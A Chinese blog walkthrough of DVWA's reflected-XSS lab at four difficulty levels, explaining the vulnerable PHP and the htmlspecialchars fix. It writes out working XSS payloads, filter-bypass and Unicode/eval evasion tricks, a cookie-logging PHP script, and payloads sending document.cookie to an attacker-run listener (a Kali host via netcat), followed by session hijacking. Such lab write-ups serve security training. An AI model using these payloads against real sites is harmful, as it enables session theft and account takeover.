DVWA--反射型XSS(Reflected)攻略详解

最新推荐文章于 2024-04-20 17:51:01 发布
最新推荐文章于 2024-04-20 17:51:01 发布
阅读量5.6k 收藏 45
点赞数 9
分类专栏: # DVWA 文章标签: 信息安全 xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Silver_lion/article/details/107945099
版权

目录

反射型XSS攻击

Low等级

Medium等级

High等级

Impossible等级

补充

反射型XSS攻击

        又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击) 恶意代码并没有保存在目标网站,由浏览器解析脚本。

Low等级

输入<script>alert(/xss/)</script>测试漏洞,成功弹框

注:可以弹窗的函数有alert(),confirm(),prompt()

这里使用本地的服务器来获取用户的cookie

在自己服务器上的www目录下创建一个cookie.php文件,内容如下:

<?php

$cookie=$_GET['$cookie'];//将get请求参数存储到cookie变量中

$file_put_contents('cookie.txt',$cookie);//把偷取的用户cookie写到cookie.txt文件中。

?>

编写js代码将页面的cookie发送到cookie.php

<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie;</script>

//document.location将页面的内容指定到指定位置。

构造URL

http://localhost/dvwa/vulnerabilities/xss_r/?name=
<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

对参数js代码部分进行URL编码

http://localhost/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D'http%3A%2F%2F127.0.0.1%2Fcookie.php%3Fcookie%3D'%2Bdocument.cookie%3B%3C%2Fscript%3E%23%0A

发送URL给用户

当受害者的浏览器有该网站的cookie的情况下点击该链接时,会跳转到http://127.0.0.1/cookie.php,并将cookie写入到了同目录下的cookie.txt中,攻击者就可以在自己服务器上获取到该受害者的cookie

成功拿到受害者的cookie

利用cookie登陆DVWA的首页

F12键,修改当前浏览器的cookie,然后刷新访问DVWA的index.php页面,就能以管理员的身份进入,如下图

观察源代码,可以发现:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Feedback for end user
	$html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

array_key_exists检查数组中是否有指定的键名

·  X-XSS-Protection: 1强制XSS保护(如果XSS保护被用户禁用,则有用)

·  X-XSS-Protection: 0禁用XSS保护

可以看到,在low级别中没用进行任何的对XSS攻击的防御措施,用户输入什么都会被执行。

Medium等级

使用<script>alert(/xss/)</script>继续测试是否有XSS漏洞

发现<script>标签被过滤了,尝试使用大小写混淆或者双写绕过

大小写混淆:

输入<ScRipt>alert(/xss/)</script>,成功弹框

双写绕过:
输入<sc<script>ript>alert(/xss/)</script>,成功弹框

输入其他标签:

输入<img src=x οnerrοr=alert(/xss/)>,成功弹窗

利用之前Low等级时构造的js的方法重新构造url发送给送给受害者,就可获取到受害者的cookie

观察源代码,可以发现:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = str_replace( '<script>', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

$name变量使用了str_replace函数过滤了<script>字符,但这可以通过大小写混淆或者双写等其他方式绕过

High等级


继续使用<script>alert(/xss/)</script>测试是否有XSS漏洞:

可以发现只显示>,前面所有字符被过滤

那尝试使用大小写混淆或者双写绕过,

<ScRipt>alert(/xss/)</script>或者<sc<script>ript>alert(/xss/)</script>

但依然发现所有字符被过滤:

既然script标签代码被过滤,那就尝试上面用到的,使用img、body等标签的事件或者iframe等标签的src注入恶意js代码。

在输入框中输入<img src=x οnerrοr=alert(/xss/)>,成功弹窗:

这里构造下攻击链接,利用ip地址为192.168.238.50的kali来接收cookie

<img src=x onerror=document.body.appendChild(document.createElement('img')).setAttribute('src','192.168.238.50:8080/?='+document.cookie);>

然后监听kali的8080端口,如果受害者访问了该链接,则可获取其cookie 

监听方法:

1.利用netcat 

在kali命令行运行

nc -vlp 8080

2.利用python

Python -m SimpleHTTPServer 8080

观察下high等级的源代码,可以发现:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

这次的$name变量使用的是preg_replace函数,这个函数用于正则表达式的搜索和替换了<script>,这使得双写绕过、大小写混淆绕过(正则表达式中,.*表示贪婪匹配,/i表示不区分大小写)不再有效,所以这里使用的时img标签。

Impossible等级

Impossible在DVWA中安全等级是最高的了,这里查看源代码了解一下防范xss攻击的原理:

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$name = htmlspecialchars( $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

这里使用了一个htmlspecialchars函数,htmlspecialchars()这个函数的的功能:是把预定义的字符&、"、'、<、>转换为 HTML 实体,防止浏览器将其作为HTML元素。还加入了Anti-CSRF token,防止结合CSRF(跨站请求伪造)攻击

补充

编码脚本代码绕过关键字过滤

        有些时候服务器会对代码中关键字进行过滤(如alert),这个时候我们可以尝试将关键字进行Unicode编码后再插入,不过,直接使用编码是不能被浏览器执行的,但是可以用eval()语句来实现,eval()会将编码后的语句解码后在执行。

例如:alert(“xss”)编码过后构造的攻击代码:

<script>eval(\u0061\u006c\u0065\u0072\u0074("xss"))</script>

编码过滤原理:

        当浏览器接受到一份HTML代码后,会对标签之间(<p>xxx</p>等,<script>除外)、标签的属性中(<a href='xxxx'>)进行实体字符解码变为相应的字符,而不会发挥出其本来该有的功能,如:&#60;被解码为<后,仅被当作字符,而不会被当成标签名的起始。既然是字符串,那在href='xx'这些属性值本来就是字符串的地方可以作为一种可能的绕过的手段。

        当js解释器在标识符名称(例如函数名,属性名等等)中遇到unicode编码会进行解码,并使其标志符照常生效。而在字符串中遇到unicode编码时会进行解码只会被当作字符串。如

<script>\u0061\u006c\u0065\u0072\u0074(1)</script>

解码后为<script>alert(1)</script>,一样可以弹窗。但如果是

<script>document.write('\u0039\u0041\u0059\u0097\u0108;\u0101\u0114\u0016\u0040\u0039\u0049\u0049\u0049')</script>

        解码后为 <script>document.write(' ');alert('111')</script>就不要指望他可以弹窗了。因为解码出来的');alert('111仍为被当作字符串而不会影响上下文。

Silver_lion
关注
  • 9
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
什么是 XSS 攻击?
m0_38066007的博客
04-23 57
XSS 攻击指的是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA--反射XSS(初中高)
firecjh的博客
06-09 165
选择“View Source”查看源程序,发现对“/”进行了替换,不能使用常用的绕过方法。
DVWA学习之XSS(跨站脚本攻击)
mmxhappy的专栏
02-04 406
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击!
DVWA】6. 反射XSS Reflected(High+Impossible)
Zichel77的博客
12-12 441
既然script标签代码被过滤,那就尝试上面用到的,使用img、body等标签的事件或者iframe等标签的src注入恶意js代码。$name变量使用的是preg_replace函数,这个函数用于正则表达式的搜索和替换了。发现回显只有一个反括号,尝试使用大小写混淆或者双写绕过,继续使用测试是否有XSS漏洞、具体和Medium的引号法相同。
DVWA-master.7z 压缩包
09-14
下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下
DVWAXSS(Reflected反射XSS
RexHa的博客
10-07 1890
dvwa 反射XSS
DVWA-XSS (Reflected)-反射XSS
seanyang_的博客
06-12 2501
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA-xss-反射
AI_SumSky的博客
11-27 1127
xss-反射 反射xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。 low级别 发现get方式提交,先来个试试,发现件存在xss漏洞 分析源码发现后端并没有对提交参数做处理就直接输出 medium级别 str_replace函数只替换一次,而且区分大小写 分析页面源码发现对script做了过滤会被替换为空格,我们可以用img绕过,也可以用大小写或双写script标签来绕过 这里用双写<sc绕过 high级别 分析页面源码发
DVWA】4. 反射XSS Reflected(Low)
Zichel77的博客
08-20 930
用户、攻击者、被攻击的Web服务器、攻击者的Web服务器。
漏洞:反射 XSS 攻击
平凡的人类的博客
03-09 8971
什么是反射 XSS 攻击? 反射 XSS 是指应用程序通过 Web 请求获取不可信赖的数据,并在未检验数据是否存在恶意代码的情况下,将其发送给用户。反射XSS一般可以由攻击者构造带有恶意代码参数的URL来实现,在构造的URL地址被打开后,其中包含的恶意代码参数被浏览器解析和执行。这种攻击的特点是非持久化,必须用户点击包含恶意代码参数的链接时才会触发。 实现目的: (其实说白了就类似于 SQL 注入,只不过一个是针对数据库,一个是针对 HTML ) 通过你提交的数据,实现反射 XSS 可以..
DVWA-master.zip
01-04
DVWA-master.zip
DVWA-master安装包
02-28
学习网络安全的利器
DVWA-master.rar
03-15
DVWA靶场,需要配合PHPstudy实用
DVWA-2.0.1
09-23
在Github下载的DVWA 2.0.1,资源github上可找,如果所需下载积分超过1,那没必要。。。。.。。。。。。。
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
DVWA-2.0.1.tar.gz
06-29
适合网络安全初级入门的同学练习
XSS-跨站脚本攻击 漏洞详解
最新发布
m0_69043895的博客
04-20 944
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过在DOM中注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [houkc.github.io:HouKC的博客](https://download.csdn.net/download/weixin_42157567/18459500)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [DVWA-XSS(DOM)](https://blog.csdn.net/weixin_44866139/article/details/104101228)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值